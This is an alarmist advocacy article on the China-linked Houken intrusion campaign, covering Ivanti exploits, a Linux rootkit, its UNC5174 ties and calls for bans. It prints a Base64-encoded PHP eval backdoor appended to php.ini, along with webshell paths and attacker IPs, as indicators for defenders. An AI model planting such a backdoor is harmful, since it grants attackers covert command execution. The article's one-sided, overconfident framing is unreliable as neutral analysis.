CHINESE DIGITAL AGGRESSION IS NO LONGER TOLERABLE: HOUKEN ROOTKITS UNVEIL BEIJING'S LIMINAL WARFARE STRATEGY

Key Takeaways

• Aggressive State-Sponsored Cyber Operations: The Chinese state is actively engaged in a persistent and incremental "Liminal Warfare" against Western nations, using sophisticated cyber espionage as a primary weapon to erode sovereignty, economic capacity, and national security below the threshold of conventional conflict.

• Houken: An Elite Spearhead: Houken is identified as an elite threat group operating since September 2024, utilizing previously unknown zero-day vulnerabilities in critical internet-exposed appliances like Ivanti Cloud Service Appliances (CSA) to gain initial access to vital sectors including government, telecommunications, media, finance, and transport.

• Advanced Persistence Mechanisms: Houken employs highly sophisticated tools like kernel-level Linux rootkits (sysinitd.ko and sysinitd) , which hijack TCP traffic and grant root privileges, making detection and remediation extremely difficult and ensuring prolonged, covert access. They also deploy custom PHP webshells and modify legitimate scripts for persistence.

• Direct Link to Chinese State Apparatus: Houken is definitively linked to UNC5174, a group widely considered an access broker for China's Ministry of State Security (MSS). Shared tactics, techniques, and procedures (TTPs) include specific account creation ("Root6") , self-patching of exploited vulnerabilities , and the use of common open-source tools predominantly developed by Chinese programmers.

• Broader Chinese Cyber Ecosystem: China's cyber capabilities are a product of deep integration between the PLA, MSS, universities (e.g., Shanghai Jiao Tong, Zhejiang, Harbin Institute of Technology) , and private cybersecurity firms (e.g., Beijing TopSec), which serve as incubators for talent and development centers for offensive tools.

• Massive Economic Espionage and Sabotage Potential: The primary motivation extends beyond intelligence gathering to include economic espionage, resulting in billions of dollars in IP theft annually from Western industries. Groups like Volt Typhoon (linked to PLA) have pre-positioned implants in critical infrastructures (e.g., U.S. power grids, ports, water facilities) , indicating preparation for potential sabotage during crises.

• Tactics for Attribution Obfuscation: Chinese threat actors actively use methods to obscure their origins, including commercial VPNs , residential/mobile IPs , and publicly available malware , making it extremely difficult to trace attacks back to Beijing and enabling plausible deniability.

• Intolerable Aggression and Call for Action: This persistent and incremental aggression is no longer tolerable. A fragmented response is perceived as weakness. An immediate, unified, and decisive global response is required, including aggressive intelligence sharing, robust defensive measures, firm attribution, and strategic international collaboration.

• Urgent Need to Ban Strategic Chinese Technologies: The inherent risks posed by the integration of Chinese technology companies with the state's intelligence and military apparatus necessitate urgent evaluation and potential prohibition of Chinese hardware, software, and services in critical and strategic sectors. These technologies may act as inherent "backdoors" or "Trojan horses" facilitating cyberattacks and compromising national security.

• 
  

The world is at war. Not a conventional war, with tanks and missiles, but a subtle, persistent, and incremental war: the "Liminal Warfare" waged by the Chinese State. This doctrine, or "unrestricted warfare," theorizes and implements conflict that operates below the threshold of conventional armed conflict, leveraging every available means—economic, political, social, and, crucially, cyber—to erode the sovereignty, economic capacity, and national security of adversaries without ever declaring war. At the heart of this digital storm stands Houken, an elite threat group whose ferocity and sophistication raise chilling questions about our ability to defend against state-sponsored espionage that knows no bounds. The French National Agency for the Security of Information Systems (ANSSI) has peeled back the curtain on these operations, revealing how infiltration into critical infrastructures and the massive exfiltration of data are inescapable pillars of Beijing's hybrid warfare, not merely for intelligence gathering, but as preparation for future sabotage operations or direct influence. This aggression is no longer tolerable and demands an immediate and decisive response.

The state-sponsored cyber espionage by the Chinese State is not a recent phenomenon but the culmination of meticulous strategic preparation. Following the military and intelligence restructuring initiated by Xi Jinping in 2016, the techniques employed by China-affiliated espionage groups have continuously evolved, becoming more covert and agile. The objective: to make attribution and identification of operations extremely difficult.

Beijing has developed a sophisticated arsenal of tactics and techniques. Intellectual property (IP) theft is conducted on a planetary scale, with cyber intrusions allowing Chinese companies to access proprietary information, project funding data, and technological secrets. This is not merely the theft of science and technology, but a method of intelligence gathering for potential attacks against military, governmental, and commercial systems in target countries.

The People's Liberation Army (PLA) and the Ministry of State Security (MSS) coordinate these operations. Groups like Volt Typhoon, linked to the PLA, have infiltrated American critical infrastructures for years—from ports to factories, water treatment plants to power grids, including strategic territories like Guam—with the objective of "sabotage in times of crisis or war." Concurrently, the MSS operates with a much broader geographical reach, targeting the United States, Europe, and Latin America.

The Chinese strategy is characterized by:

• Exploitation of zero-day and N-day vulnerabilities: Beijing has effectively exploited more zero-days and N-days in 2020/2021 than any other state.

• Supply chain compromise: Supply chain compromise incidents conducted by Chinese actors from 2013 to 2020 are almost double those of Russia and North Korea combined. Noteworthy examples include the APT41 campaign against the ASUS update utility, dubbed "Operation ShadowHammer," which affected over 50,000 systems.

• Diverse initial access vectors: Email phishing, social engineering, strategic web compromise, and SQL injection are just some of the techniques used to gain initial access.

• Attribution obfuscation: Chinese groups use publicly available malware to blend in with other threat activities, and they employ a vast network of private companies and contractors to conceal government involvement. The indictment of 10 Chinese citizens on behalf of i-Soon and two officials from the Chinese Ministry of Public Security (MPS) is clear evidence of this.

• "Dual-use" operations: Espionage and criminal activities (like ransomware, especially in the video game sector) are deliberately mixed to confuse attribution.

The cost of this aggression is devastating. Intellectual property theft alone costs the U.S. economy up to $600 billion annually, a figure that exceeds the total profits of the top 50 companies in the Fortune 500. Cyber intrusions pose a fundamental threat to the economic competitiveness and national security of affected states. Dutch military intelligence (MIVD) has stated that Chinese espionage is more widespread than initially thought, with a state-backed group causing at least 20,000 victims in just a few months in 2023.

The attack campaign: The dawn of a new era of threats

Since September 2024, Houken has launched a targeted offensive, exploiting zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) devices—critical, internet-exposed network appliances serving as pivotal access points. These flaws, unknown and unpatched at the time of the attacks, provided Houken an invisible entry, demonstrating their superior capability in discovering and exploiting top-tier vulnerabilities—a clear signal of limitless resources and malicious intent.

Once a foothold was established on Ivanti CSA devices, Houken's objectives became grimly clear: to acquire credentials through the execution of a base64-encoded Python script, establish insidious persistence via PHP webshells (often created or injected into legitimate scripts), and, in a terrifying escalation, install kernel modules acting as rootkits. In a further calculated challenge to defenders, Houken even attempted to self-patch the exploited vulnerabilities post-compromise, making it harder for other actors or victims themselves to detect and close the breaches. The latest activities linked to this campaign were observed by ANSSI at the end of November 2024.

Global reach: The world in the crosshairs of Chinese espionage

Houken's impact is not confined to France. ANSSI has confirmed incidents affecting French governmental, telecommunications, media, finance, and transport sectors, but its reach extends to Southeast Asia (including Thailand, Vietnam, and Indonesia), Europe, and the United States. This strategic targeting perfectly aligns with the hypothesis that Houken acts as an "access broker" on behalf of a state entity, likely interested in sensitive information. The attackers' operational time zone, UTC+8 (CST), unequivocally points to Beijing. This economic and political espionage, masked as criminal activity, is a hallmark of "Liminal Warfare," where the lines between peace and conflict are deliberately blurred.

Houken and UNC5174: A criminal link to the Chinese state apparatus

ANSSI's investigations have traced a direct and irrefutable link between Houken and UNC5174, a threat group previously identified by Google Threat Intelligence Group (GTIG) as a potential access broker for the Chinese Ministry of State Security (MSS). The operational similarities between the two groups are too striking to be coincidental; they are evidence of a single criminal mind operating on behalf of the Chinese state:

• "Root6" account creation: A distinctive practice observed in both Houken and UNC5174.

• Systematic self-patching: Both groups show a preference for self-patching exploited vulnerabilities, a tactic that hinders detection and mitigation by victims.

• Shared open-source tools: Houken's arsenal includes open-source tools like GOREVERSE, VShell, fscan, and ffuff, all known to have been used by UNC5174 and predominantly developed by Chinese-speaking programmers, suggesting a common ecosystem for developing and procuring malicious tools. Known tools include Nmap, Fscan, Netspy, Nacs for network discovery; Ettercap, Responder for network attack; Iox, FRP, NPS (NPC), EarthWorm, GoHTran, ReverseSocks5, Suo5 for proxy and tunneling; Searchall for credential gathering; and GOREVERSE (reverse_ssh), ReverseSSH, SparkRAT for backdoors and persistence.

• Specific filenames: The use of the filename "OutlookEN.aspx" for suo5 webshells by Houken mirrors a documented practice of UNC5174.

These operational overlaps paint a terrifying picture: Houken and UNC5174 are likely managed by a single threat actor whose mission transcends mere financial gain. ANSSI has indeed observed an escalation in Houken's post-exploitation activities, with a clear interest in intelligence gathering. The discovery in March 2025, where Houken exfiltrated a massive amount of emails from a South American Ministry of Foreign Affairs server, reinforces the thesis that intelligence collection is a primary motivation. This is not just economic espionage but an activity directly aimed at bolstering China's geostrategic position.

A disturbing paradox: Sophistication and calculated negligence

Houken's operators present a paradox that is both ingenious and disturbing: the ability to exploit zero-days and deploy highly complex rootkits alongside the use of a wide range of open-source tools, often developed by Chinese-speaking programmers. This ambivalence suggests a "multi-actor" model, where one group might be tasked with advanced vulnerability research, while another handles industrialized exploitation.

Their attack infrastructure is a complex mosaic: combining commercial VPN services (like NordVPN, ExpressVPN, Proton VPN, Deeper Network VPN, Surfshark VPN, and IVPN), Tor nodes, dedicated servers (VPS from HOSTHATCH, ColoCrossing, JVPS.hosting), and even residential or mobile IP addresses (such as China Unicom, China Telecom, MTS, Airtel). This heterogeneity, far from being an operational error, serves to camouflage the origins of operations and complicate attribution processes. The reuse of IP addresses like 23.236.66.97, 134.195.90.71, 64.176.49.160, and 156.234.193.18 across different victims highlights either a disregard for operational security or, more likely, a calculated trade-off given the nature of "Liminal Warfare" where speed and opportunity outweigh absolute stealth. This difficulty in attribution is a strategic objective for Beijing, allowing China to deny responsibility and operate in a "gray zone" of conflict.

Persistence mechanisms: Rootkits that defy all defenses

Houken's toolkit includes a previously unseen Linux rootkit, composed of a kernel module (sysinitd.ko) and a user-space executable (sysinitd). This rootkit is not a simple persistence tool; it is an advanced mechanism that hijacks inbound TCP traffic over all ports, allowing remote command execution with root privileges and bypassing traditional network monitoring measures. Its ability to ensure deep persistence makes detection and remediation a titanic task, enabling Beijing to maintain prolonged and covert access to compromised networks. This kernel-level malware is a stark example of the "dual-use" nature of Chinese offensive tools: while primarily for espionage, its versatility could extend to sabotage or massive compromise, complicating the identification of primary motivations. ANSSI has provided specific YARA rules for detecting this rootkit.

Other persistence mechanisms include the creation of PHP webshells with common names like /rc/help.php, /client/rcc.php, /gsb/help.php, often with custom PHP request variables such as $_REQUEST['a'] or $_REQUEST['jhc']. Some of these webshells are linked to open-source tools like Neo-reGeorg or the Behinder ("Ice Scorpion") webshell framework. Modification of file time attributes to obscure activities has also been observed. Furthermore, operators appended malicious PHP code to legitimate scripts like /etc/php.ini, allowing command execution from any page via variables like justatest, decoded from Base64 strings like PD9waHAgQGV2YWwoJF9SRVFVRVNUW2p1c3RhdGVzdF0p0yA/Pg==. The use of out-of-band application security testing (OAST) tools such as Eyes.sh and Interactsh, and services like Burp Collaborator, demonstrates a methodical approach to vulnerability discovery.

Devastating consequences: The true cost of "Liminal Warfare"

Persistent access to global critical infrastructures such as energy, transportation, or telecommunications is not merely a matter of intelligence gathering. It is a strategic capability that, in a geopolitical escalation, could lead to massive service disruptions, direct sabotage, or the manipulation of vital infrastructures, compromising national security and civil stability. Control over these systems is not just for espionage, but for the ability to "turn off" or "manipulate" entire sectors when strategically necessary.

In parallel, economic espionage inflicts devastating damage on global economies. The theft of intellectual property, trade secrets, and research and development data—as extensively demonstrated by groups like APT41, which have targeted sectors from aerospace to pharmaceuticals in over 20 countries—results in incalculable economic bleeding for Western companies and an erosion of national competitiveness and innovation. These thefts are not isolated incidents but part of a systematic transfer of wealth and technology that shifts global economic balances in Beijing's favor. The Commission on the Theft of American Intellectual Property estimated that for the U.S. alone, intellectual property theft costs the economy up to $600 billion annually, a figure exceeding the total profits of the top 50 Fortune 500 companies. Flagrant cases such as APT41's 2018 campaign against the ASUS update utility, dubbed "Operation ShadowHammer" by Kaspersky, which affected over 50,000 systems, underscore the massive scale and gravity of these operations.

China has demonstrated a disturbing capacity for sabotage, as evidenced by the Volt Typhoon group's intrusions. In 2023, Volt Typhoon infiltrated a staggering range of American critical infrastructures for years—from ports to factories, water treatment plants to power grids—including strategic U.S. territories like Guam. These "preparatory implants" or "digital tripwires" were inserted for political and potentially military objectives. Volt Typhoon also attacked a U.S. electric utility in Massachusetts in 2023, aiming to exfiltrate sensitive operational technology (OT) infrastructure data. The actions of the Volt Typhoon subgroup, Voltzite, against Little Electric Light and Water (LELWD) departments necessitated a joint FBI and Dragos response. This is not mere espionage, but clear preparation for electronic warfare and sabotage in times of crisis. Dutch military intelligence (MIVD) has stated that Chinese espionage is more widespread than initially thought, with a state-backed group causing at least 20,000 victims in just a few months in 2023. European parliamentarians have also been targeted by Chinese cyberattacks, with a March 2024 U.S. indictment alleging that Chinese hackers linked to the MSS targeted "every member of the European Union" in the Inter-Parliamentary Alliance on China (IPAC), sending over 1,000 emails to collect data. This attack extended to the European Parliament itself, where Chinese espionage reportedly infiltrated.

State-sponsored cyber espionage: The evolution of an intolerable threat

State-sponsored cyber espionage by the Chinese State constitutes only a part of the broader scope of cyber warfare activities. Following the military and intelligence restructuring initiated by Xi Jinping in 2016, the techniques employed by China-affiliated espionage groups have continuously evolved, becoming more covert and agile. The objective: to make attribution and identification of operations extremely difficult.

Chinese cyber groups have become more clandestine and sophisticated, adopting measures to complicate attribution and identification of their operations. The use of software supply chains and third-party compromises to gather data now makes detection and prevention of intrusions more challenging. Cyber espionage malware has also been modernized to operate across a wider variety of operating systems. Chinese groups, in an attempt to blend in with other threat activities, are increasingly likely to use publicly available malware.

What distinguishes Chinese cyber espionage from that of other states are the national interests pursued and the scale of operations. Beijing has unique intelligence collection requirements, for instance, in Hong Kong, Tibet, and the Uyghur community; and in terms of scale, Chinese activity is greater. State-linked Chinese groups conducting compromises exploit more zero-days and are numerically larger than those of other states. Chinese actors use a variety of “initial access vectors” such as email phishing and social engineering, strategic web compromise, and SQL injection. They have also effectively exploited N-day and zero-day compromises in 2020/2021 more than any other state.

In early 2020, one of the most prolific Chinese cyber espionage groups, APT41, conducted a large-scale campaign, exploiting vulnerabilities in corporate network and endpoint management devices from Citrix, Cisco, and Zoho, successfully impacting over 75 companies in more than 20 countries with activities ranging from aerospace to defense, pharmaceuticals, energy, and public utilities. From January to March 2021, at least five sets of Chinese activities exploited "ProxyLogon" vulnerabilities in Microsoft Exchange to gain access to targeted networks. Many intrusions conducted between August 2020 and March 2021 in the defense, government, high-tech, transportation, and financial sectors of the United States and Europe were attributed to two Chinese clusters, one of which is suspected to have ties to the group known as APT5. The Chinese group named APT10 reportedly also conducted third-party compromises via MSPs in North America and Europe. During an investigation in response to 2019 incidents at a telecommunications network provider, malware named MESSAGETAP was attributed to the APT41 group.

Beijing's cyber espionage activities fall under both the Ministry of State Security (MSS) and the PLA, but they differ in geographical scope, operational alignment, and victims. While threat groups affiliated with the PLA's Theater Commands, such as Tonto Team, TEMP, and Overboard, focus operations within their respective Commands' areas of responsibility, those of the MSS, like APT41, APT5, and APT10, operate over a much wider geographical scope, including the United States, Europe, Latin America, the Caribbean, and North America. Essentially, the MSS conducts internal counter-espionage operations, non-military foreign intelligence, and supports aspects of political security.

This vast espionage network extends deeply into Chinese society. Chinese universities openly collaborate with the PLA and the MSS to conduct state-sponsored cyber espionage operations. Institutions like Shanghai Jiao Tong University, Zhejiang University, Harbin Institute of Technology, Xidian University, Southeast University, and others are veritable incubators for hackers and research centers dedicated to developing offensive capabilities for the Chinese military and intelligence, receiving direct funding from the PLA and MSS. The U.S. Department of Justice has even accused Chinese nationals and officials from the Ministry of Public Security (MPS) of directing hacking operations on behalf of private companies like i-Soon, demonstrating the hybrid and covert nature of these attacks. Some Chinese cybersecurity firms, such as Beijing TopSec, work with the PLA on hacking campaigns, operator training, and the instruction of future hackers. Critical technologies, like advanced semiconductors from ASML in the Netherlands, or research at centers like Imec in Belgium, have become primary targets, pushing the European Union to increase security and assess risks.

The future of Houken: A persistent and evolving threat – A WAR NO LONGER TOLERABLE

The threat actor behind Houken and UNC5174 remains frighteningly active. It is certain that they will continue to target internet-facing equipment, such as endpoint managers or VPN appliances, through opportunistic global vulnerability exploitation. This is not a forecast, but a harsh reality imposed by Chinese strategy.

The continuous evolution of Houken's tactics, their disarmingly effective exploitation of zero-days, and their operational ambivalence represent an existential threat to global cybersecurity. Chinese "Liminal Warfare," which views state espionage as an inseparable pillar of a hybrid strategy, demands a unified and decisive international response. Passivity or a fragmented response from Western states will be perceived as weakness, encouraging further, more audacious attacks. It is imperative that our intelligence agencies and governments adopt adequate management and response to this persistent and incremental threat. We can no longer tolerate this constant aggression.

Urgent mitigation measures: IT'S TIME TO ACT

1. Proactive deterrence and denial of benefits: Develop and implement cyber deterrence strategies that not only threaten a proportionate response but also make attacks too costly or ineffective for the aggressor. This includes the ability to respond rapidly and proportionately.

2. Aggressive intelligence sharing: Intensify the sharing of IoCs (Indicators of Compromise), TTPs, and threat intelligence among government agencies, critical sectors, and international partners. Speed in information dissemination is crucial for preemptive defense.

3. Strengthening defenses: Massively invest in the resilience of critical infrastructures, implementing advanced security solutions, such as behavior-based detection and artificial intelligence, to identify the most sophisticated threats like rootkits. Crucial are network segmentation to contain compromises, timely patching of N-day vulnerabilities (already known but not yet patched), and continuous and in-depth monitoring to identify anomalous activities.

4. Supply chain security: Drastically strengthen the security of software and hardware supply chains to mitigate the risks of upstream compromises, a vector widely exploited by Chinese actors.

5. Firm attribution and counter-intelligence: Enhance capabilities for rapid and accurate attribution of attacks. Once attribution is established, apply targeted sanctions, public condemnations, and joint diplomatic pressure to increase political and economic costs for China. Counter-intelligence capabilities are also necessary to dismantle Chinese recruitment, training, and malware development networks.

6. International collaboration: Promote and solidify international cybersecurity alliances, developing joint defensive and offensive strategies.

7. Ban on strategic Chinese technologies: Urgently evaluate and, where necessary, implement a ban on the use of hardware, software, and technological services originating from China in critical and strategic sectors. The proven integration between Chinese companies, universities, and the espionage apparatus makes these tools potential "service doors" or "Trojan horses" within our networks, facilitating cyberattacks and compromising our security from the ground up. The only solution is to eradicate the risk at its root by excluding suppliers whose control chains and purposes are opaque and potentially hostile.

Transnational cooperation and timely sharing of threat intelligence are no longer options but absolute imperatives to hope to counter the increasingly audacious operations of these actors and safeguard our national security and sovereignty in this new era of conflict. The time for waiting is over. China is waging war, and the world must respond with the same determination.

About Extrema Ratio

Extrema Ratio is a leading, widely known organization specializing in Open Source Analysis and Intelligence (OSINT), with a particular focus on China's liminal global influence and the complexities of international relations. Through in-depth research, analysis, and expert commentary, Extrema Ratio provides valuable insights into national security, foreign malicious interference, and strategic challenges posed by emerging global powers.

The organization's mission is to inform the public and advise policymakers, public and private institutions, businesses and professionals on the risks and opportunities of today's rapidly changing geopolitical landscape. For more analysis and resources, visit Extrema Ratio's blog and publications.